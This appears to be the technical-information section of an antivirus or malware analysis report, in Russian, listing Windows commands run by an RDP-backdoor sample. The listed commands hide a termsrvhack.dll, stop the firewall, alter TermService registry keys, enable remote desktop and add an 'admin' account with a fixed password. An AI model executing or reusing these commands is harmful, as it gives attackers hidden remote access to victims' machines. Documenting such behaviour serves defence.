Техническая информация
- '<SYSTEM32>\attrib.exe' +H +S +R <SYSTEM32>\termsrvhack.dll
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrvhack.dll /f
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' start termservice
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\net1.exe' start dcomlaunch
- '<SYSTEM32>\svchost.exe' -k DcomLaunch
- '<SYSTEM32>\net1.exe' user admin 7758521 /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s admin /add
- '<SYSTEM32>\wscript.exe' "<SYSTEM32>\3389.vbs"
- '<SYSTEM32>\cmd.exe' /c ""<SYSTEM32>\3389.bat" "
- '<SYSTEM32>\tasklist.exe' /svc
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- '<SYSTEM32>\find.exe' "TermService"
- '<SYSTEM32>\taskkill.exe' /pid 844 /f
- <SYSTEM32>\svchost.exe
- <SYSTEM32>\3389.bat
- <SYSTEM32>\termsrvhack.dll
- <SYSTEM32>\3389.vbs
- <SYSTEM32>\termsrvhack.dll
- <SYSTEM32>\3389.vbs
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'